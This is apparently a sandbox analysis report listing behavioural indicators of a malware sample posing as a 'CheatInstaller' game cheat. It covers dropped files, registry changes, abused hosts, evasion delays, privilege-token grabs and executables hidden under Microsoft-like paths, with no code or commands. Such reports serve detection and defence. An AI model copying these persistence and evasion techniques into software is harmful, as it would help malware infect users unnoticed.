File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8D16.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8DD7.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e578155.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI81F1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF8DACFDCF713D0C1F.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8D87.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8E26.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8E46.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI19FF.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e578159.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF78A4C50DDCA7D385.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1E94.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI41C1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8F12.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8F23.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8D66.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1E95.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF20569839C8982FFC.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8262.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8592.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8D97.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4150.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e578155.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8242.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4162.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF5B8EF6BF7B358C2A.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8D27.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4151.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8231.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI85E1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8572.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8272.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8283.tmp C:\Windows\system32\msiexec.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" C:\Windows\syswow64\MsiExec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe N/A
